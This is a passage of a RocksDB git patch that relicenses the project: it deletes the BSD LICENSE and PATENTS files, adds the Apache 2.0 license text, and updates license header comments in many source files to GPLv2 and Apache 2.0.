 util/arena.h | 8 +-
 util/arena_test.cc | 8 +-
 util/auto_roll_logger.cc | 8 +-
 util/auto_roll_logger.h | 8 +-
 util/auto_roll_logger_test.cc | 8 +-
 util/autovector.h | 8 +-
 util/autovector_test.cc | 8 +-
 util/bloom.cc | 8 +-
 util/bloom_test.cc | 8 +-
 util/build_version.h | 8 +-
 util/channel.h | 8 +-
 util/coding.cc | 8 +-
 util/coding.h | 8 +-
 util/coding_test.cc | 8 +-
 util/compaction_job_stats_impl.cc | 6 +-
 util/comparator.cc | 8 +-
 util/compression.h | 6 +-
 util/concurrent_arena.cc | 8 +-
 util/concurrent_arena.h | 8 +-
 util/core_local.h | 8 +-
 util/crc32c.cc | 8 +-
 util/crc32c.h | 8 +-
 util/crc32c_test.cc | 8 +-
 util/delete_scheduler.cc | 8 +-
 util/delete_scheduler.h | 8 +-
 util/delete_scheduler_test.cc | 8 +-
 util/dynamic_bloom.cc | 6 +-
 util/dynamic_bloom.h | 6 +-
 util/dynamic_bloom_test.cc | 8 +-
 util/event_logger.cc | 8 +-
 util/event_logger.h | 8 +-
 util/event_logger_test.cc | 8 +-
 util/fault_injection_test_env.cc | 8 +-
 util/fault_injection_test_env.h | 8 +-
 util/file_reader_writer.cc | 8 +-
 util/file_reader_writer.h | 8 +-
 util/file_reader_writer_test.cc | 8 +-
 util/file_util.cc | 8 +-
 util/file_util.h | 8 +-
 util/filelock_test.cc | 8 +-
 util/filename.cc | 8 +-
 util/filename.h | 8 +-
 util/filter_policy.cc | 8 +-
 util/hash.cc | 8 +-
 util/hash.h | 8 +-
 util/hash_map.h | 8 +-
 util/hash_test.cc | 8 +-
 util/heap.h | 8 +-
 util/heap_test.cc | 8 +-
 util/kv_map.h | 8 +-
 util/log_buffer.cc | 8 +-
 util/log_buffer.h | 6 +-
 util/log_write_bench.cc | 8 +-
 util/logging.h | 8 +-
 util/memory_usage.h | 8 +-
 util/mpsc.h | 6 +-
 util/murmurhash.cc | 8 +-
 util/murmurhash.h | 8 +-
 util/mutexlock.h | 8 +-
 util/random.cc | 8 +-
 util/random.h | 8 +-
 util/rate_limiter.cc | 8 +-
 util/rate_limiter.h | 8 +-
 util/rate_limiter_test.cc | 8 +-
 util/slice.cc | 8 +-
 util/slice_transform_test.cc | 8 +-
 util/sst_file_manager_impl.cc | 8 +-
 util/sst_file_manager_impl.h | 8 +-
 util/status.cc | 8 +-
 util/status_message.cc | 6 +-
 util/stderr_logger.h | 8 +-
 util/stop_watch.h | 8 +-
 util/string_util.cc | 8 +-
 util/string_util.h | 8 +-
 util/sync_point.cc | 8 +-
 util/sync_point.h | 8 +-
 util/testharness.cc | 8 +-
 util/testharness.h | 8 +-
 util/testutil.cc | 8 +-
 util/testutil.h | 8 +-
 util/thread_list_test.cc | 8 +-
 util/thread_local.cc | 8 +-
 util/thread_local.h | 8 +-
 util/thread_local_test.cc | 8 +-
 util/thread_operation.h | 6 +-
 util/threadpool_imp.cc | 8 +-
 util/threadpool_imp.h | 8 +-
 util/timer_queue.h | 6 +-
 util/timer_queue_test.cc | 6 +-
 util/transaction_test_util.cc | 6 +-
 util/transaction_test_util.h | 6 +-
 utilities/backupable/backupable_db.cc | 8 +-
 utilities/backupable/backupable_db_test.cc | 8 +-
 utilities/blob_db/blob_db.cc | 6 +-
 utilities/blob_db/blob_db.h | 8 +-
 utilities/blob_db/blob_db_impl.cc | 6 +-
 utilities/blob_db/blob_db_impl.h | 6 +-
 utilities/blob_db/blob_db_options_impl.cc | 6 +-
 utilities/blob_db/blob_db_options_impl.h | 6 +-
 utilities/blob_db/blob_db_test.cc | 6 +-
 utilities/blob_db/blob_dump_tool.cc | 8 +-
 utilities/blob_db/blob_dump_tool.h | 8 +-
 utilities/blob_db/blob_file.cc | 6 +-
 utilities/blob_db/blob_log_format.cc | 6 +-
 utilities/blob_db/blob_log_format.h | 6 +-
 utilities/blob_db/blob_log_reader.cc | 6 +-
 utilities/blob_db/blob_log_reader.h | 6 +-
 utilities/blob_db/blob_log_writer.cc | 6 +-
 utilities/blob_db/blob_log_writer.h | 6 +-
 utilities/checkpoint/checkpoint_impl.cc | 8 +-
 utilities/checkpoint/checkpoint_impl.h | 8 +-
 utilities/checkpoint/checkpoint_test.cc | 8 +-
 utilities/col_buf_decoder.cc | 6 +-
 utilities/col_buf_decoder.h | 6 +-
 utilities/col_buf_encoder.cc | 6 +-
 utilities/col_buf_encoder.h | 6 +-
 utilities/column_aware_encoding_exp.cc | 8 +-
 utilities/column_aware_encoding_test.cc | 8 +-
 utilities/column_aware_encoding_util.cc | 8 +-
 utilities/column_aware_encoding_util.h | 6 +-
 .../remove_emptyvalue_compactionfilter.cc | 6 +-
 .../remove_emptyvalue_compactionfilter.h | 6 +-
 utilities/convenience/info_log_finder.cc | 8 +-
 utilities/date_tiered/date_tiered_db_impl.h | 8 +-
 utilities/debug.cc | 8 +-
 utilities/document/document_db.cc | 8 +-
 utilities/document/document_db_test.cc | 8 +-
 utilities/document/json_document.cc | 8 +-
 utilities/document/json_document_builder.cc | 8 +-
 utilities/document/json_document_test.cc | 8 +-
 utilities/env_librados_test.cc | 8 +-
 utilities/env_mirror.cc | 6 +-
 utilities/env_mirror_test.cc | 8 +-
 utilities/env_timed.cc | 6 +-
 utilities/env_timed_test.cc | 6 +-
 utilities/geodb/geodb_impl.cc | 8 +-
 utilities/geodb/geodb_impl.h | 8 +-
 utilities/geodb/geodb_test.cc | 8 +-
 utilities/leveldb_options/leveldb_options.cc | 8 +-
 utilities/lua/rocks_lua_compaction_filter.cc | 8 +-
 utilities/lua/rocks_lua_test.cc | 8 +-
 utilities/memory/memory_test.cc | 6 +-
 utilities/memory/memory_util.cc | 6 +-
 utilities/merge_operators.h | 8 +-
 .../cassandra/cassandra_format_test.cc | 6 +-
 .../cassandra/cassandra_merge_test.cc | 6 +-
 .../cassandra/cassandra_row_merge_test.cc | 6 +-
 .../cassandra/cassandra_serialize_test.cc | 6 +-
 utilities/merge_operators/cassandra/format.cc | 6 +-
 utilities/merge_operators/cassandra/format.h | 6 +-
 .../cassandra/merge_operator.cc | 6 +-
 .../cassandra/merge_operator.h | 6 +-
 .../merge_operators/cassandra/serialize.h | 6 +-
 .../merge_operators/cassandra/test_utils.cc | 6 +-
 .../merge_operators/cassandra/test_utils.h | 6 +-
 utilities/merge_operators/max.cc | 8 +-
 utilities/merge_operators/put.cc | 8 +-
 utilities/merge_operators/uint64add.cc | 6 +-
 utilities/object_registry_test.cc | 6 +-
 .../option_change_migration.cc | 8 +-
 .../option_change_migration_test.cc | 8 +-
 utilities/options/options_util.cc | 6 +-
 utilities/options/options_util_test.cc | 8 +-
 .../persistent_cache/block_cache_tier.cc | 8 +-
 utilities/persistent_cache/block_cache_tier.h | 8 +-
 .../persistent_cache/block_cache_tier_file.cc | 8 +-
 .../persistent_cache/block_cache_tier_file.h | 8 +-
 .../block_cache_tier_file_buffer.h | 8 +-
 .../block_cache_tier_metadata.cc | 8 +-
 .../block_cache_tier_metadata.h | 8 +-
 utilities/persistent_cache/hash_table.h | 8 +-
 .../persistent_cache/hash_table_bench.cc | 8 +-
 .../persistent_cache/hash_table_evictable.h | 8 +-
 utilities/persistent_cache/hash_table_test.cc | 8 +-
 utilities/persistent_cache/lrulist.h | 8 +-
 .../persistent_cache_bench.cc | 8 +-
 .../persistent_cache/persistent_cache_test.cc | 8 +-
 .../persistent_cache/persistent_cache_test.h | 8 +-
 .../persistent_cache/persistent_cache_tier.cc | 8 +-
 .../persistent_cache/persistent_cache_tier.h | 8 +-
 .../persistent_cache/persistent_cache_util.h | 8 +-
 .../persistent_cache/volatile_tier_impl.cc | 8 +-
 .../persistent_cache/volatile_tier_impl.h | 8 +-
 utilities/redis/redis_lists_test.cc | 8 +-
 utilities/simulator_cache/sim_cache.cc | 8 +-
 utilities/simulator_cache/sim_cache_test.cc | 8 +-
 utilities/spatialdb/spatial_db.cc | 8 +-
 utilities/spatialdb/spatial_db_test.cc | 8 +-
 utilities/spatialdb/utils.h | 8 +-
 .../compact_on_deletion_collector.cc | 8 +-
 .../compact_on_deletion_collector.h | 8 +-
 .../compact_on_deletion_collector_test.cc | 8 +-
 .../optimistic_transaction_db_impl.cc | 8 +-
 .../optimistic_transaction_db_impl.h | 8 +-
 .../optimistic_transaction_impl.cc | 8 +-
 .../optimistic_transaction_impl.h | 6 +-
 .../optimistic_transaction_test.cc | 8 +-
 utilities/transactions/transaction_base.cc | 6 +-
 utilities/transactions/transaction_base.h | 6 +-
 utilities/transactions/transaction_db_impl.cc | 8 +-
 utilities/transactions/transaction_db_impl.h | 8 +-
 .../transactions/transaction_db_mutex_impl.cc | 8 +-
 .../transactions/transaction_db_mutex_impl.h | 8 +-
 utilities/transactions/transaction_impl.cc | 8 +-
 utilities/transactions/transaction_impl.h | 6 +-
 .../transactions/transaction_lock_mgr.cc | 8 +-
 utilities/transactions/transaction_lock_mgr.h | 8 +-
 utilities/transactions/transaction_test.cc | 8 +-
 utilities/transactions/transaction_util.cc | 8 +-
 utilities/transactions/transaction_util.h | 6 +-
 utilities/util_merge_operators_test.cc | 8 +-
 .../write_batch_with_index.cc | 8 +-
 .../write_batch_with_index_internal.cc | 8 +-
 .../write_batch_with_index_internal.h | 6 +-
 .../write_batch_with_index_test.cc | 8 +-
 865 files changed, 2799 insertions(+), 3701 deletions(-)
 delete mode 100644 LICENSE
 create mode 100644 LICENSE.Apache
 delete mode 100644 PATENTS

diff --git a/LICENSE b/LICENSE
deleted file mode 100644
index 46f685e9681..00000000000
--- a/LICENSE
+++ /dev/null
@@ -1,35 +0,0 @@
-BSD License
-
-For rocksdb software
-
-Copyright (c) 2011-present, Facebook, Inc.
-All rights reserved.
----------------------------------------------------------------------
-
-Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
- * Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above
-copyright notice, this list of conditions and the following disclaimer
-in the documentation and/or other materials provided with the
-distribution.
- * Neither the name of Google Inc. nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
diff --git a/LICENSE.Apache b/LICENSE.Apache
new file mode 100644
index 00000000000..d6456956733
--- /dev/null
+++ b/LICENSE.Apache
@@ -0,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!) The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/PATENTS b/PATENTS
deleted file mode 100644
index 65332e3a4e3..00000000000
--- a/PATENTS
+++ /dev/null
@@ -1,33 +0,0 @@
-Additional Grant of Patent Rights Version 2
-
-"Software" means the RocksDB software distributed by Facebook, Inc.
-
-Facebook, Inc. ("Facebook") hereby grants to each recipient of the Software
-("you") a perpetual, worldwide, royalty-free, non-exclusive, irrevocable
-(subject to the termination provision below) license under any Necessary
-Claims, to make, have made, use, sell, offer to sell, import, and otherwise
-transfer the Software. For avoidance of doubt, no license is granted under
-Facebook’s rights in any patent claims that are infringed by (i) modifications
-to the Software made by you or any third party or (ii) the Software in
-combination with any software or other technology.
-
-The license granted hereunder will terminate, automatically and without notice,
-if you (or any of your subsidiaries, corporate affiliates or agents) initiate
-directly or indirectly, or take a direct financial interest in, any Patent
-Assertion: (i) against Facebook or any of its subsidiaries or corporate
-affiliates, (ii) against any party if such Patent Assertion arises in whole or
-in part from any software, technology, product or service of Facebook or any of
-its subsidiaries or corporate affiliates, or (iii) against any party relating
-to the Software. Notwithstanding the foregoing, if Facebook or any of its
-subsidiaries or corporate affiliates files a lawsuit alleging patent
-infringement against you in the first instance, and you respond by filing a
-patent infringement counterclaim in that lawsuit against that party that is
-unrelated to the Software, the license granted hereunder will not terminate
-under section (i) of this paragraph due to such counterclaim.
-
-A "Necessary Claim" is a claim of a patent owned by Facebook that is
-necessarily infringed by the Software standing alone.
-
-A "Patent Assertion" is any lawsuit or other action alleging direct, indirect,
-or contributory infringement or inducement to infringe any patent, including a
-cross-claim or counterclaim.
diff --git a/build_tools/error_filter.py b/build_tools/error_filter.py
index f655ba09511..9f619cf4ba5 100644
--- a/build_tools/error_filter.py
+++ b/build_tools/error_filter.py
@@ -1,7 +1,7 @@
-# Copyright (c) 2016-present, Facebook, Inc. All rights reserved.
-# This source code is licensed under the BSD-style license found in the
-# LICENSE file in the root directory of this source tree. An additional grant
-# of patent rights can be found in the PATENTS file in the same directory.
+# Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
+# This source code is licensed under both the GPLv2 (found in the
+# COPYING file in the root directory) and Apache 2.0 License
+# (found in the LICENSE.Apache file in the root directory).
 
 '''Filter for error messages in test output:
     - Receives merged stdout/stderr from test on stdin
diff --git a/cache/cache_bench.cc b/cache/cache_bench.cc
index fda11b8696a..16c2ced1dde 100644
--- a/cache/cache_bench.cc
+++ b/cache/cache_bench.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #ifndef __STDC_FORMAT_MACROS
 #define __STDC_FORMAT_MACROS
diff --git a/cache/cache_test.cc b/cache/cache_test.cc
index 271cb0e6d80..8e241226d9c 100644
--- a/cache/cache_test.cc
+++ b/cache/cache_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/clock_cache.cc b/cache/clock_cache.cc
index afcf6345c5d..db9d1438e22 100644
--- a/cache/clock_cache.cc
+++ b/cache/clock_cache.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/clock_cache.h b/cache/clock_cache.h
index 2e5389d5cd1..1614c0ed454 100644
--- a/cache/clock_cache.h
+++ b/cache/clock_cache.h
@@ -1,7 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc
index 4751c0b1328..b201d81a4da 100644
--- a/cache/lru_cache.cc
+++ b/cache/lru_cache.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/lru_cache.h b/cache/lru_cache.h
index 28f87193ed9..4b6a9f2fec3 100644
--- a/cache/lru_cache.h
+++ b/cache/lru_cache.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/lru_cache_test.cc b/cache/lru_cache_test.cc
index d7e661a1279..87794fd1617 100644
--- a/cache/lru_cache_test.cc
+++ b/cache/lru_cache_test.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 
 #include "cache/lru_cache.h"
 
diff --git a/cache/sharded_cache.cc b/cache/sharded_cache.cc
index 81e7122e434..9bdea3a08e1 100644
--- a/cache/sharded_cache.cc
+++ b/cache/sharded_cache.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/cache/sharded_cache.h b/cache/sharded_cache.h
index c2d52c840b3..4f9dea2ad0f 100644
--- a/cache/sharded_cache.h
+++ b/cache/sharded_cache.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/builder.cc b/db/builder.cc
index a0c3fb305b0..6f973fdbd5b 100644
--- a/db/builder.cc
+++ b/db/builder.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
diff --git a/db/builder.h b/db/builder.h
index 1f8102df1d9..a432a753182 100644
--- a/db/builder.h
+++ b/db/builder.h
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
 // Use of this source code is governed by a BSD-style license that can be
 // found in the LICENSE file. See the AUTHORS file for names of contributors.
diff --git a/db/c.cc b/db/c.cc
index cc359b2c183..441ffade3b6 100644
--- a/db/c.cc
+++ b/db/c.cc
@@ -1,9 +1,7 @@
 // Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
-// This source code is licensed under the BSD-style license found in the
-// LICENSE file in the root directory of this source tree. An additional grant
-// of patent rights can be found in the PATENTS file in the same directory.
-// This source code is also licensed under the GPLv2 license found in the
-// COPYING file in the root directory of this source tree.
+// This source code is licensed under both the GPLv2 (found in the
+// COPYING file in the root directory) and Apache 2.0 License
+// (found in the LICENSE.Apache file in the root directory).
 //
 // Copyright (c) 2011 The LevelDB Authors. All rights reserved.
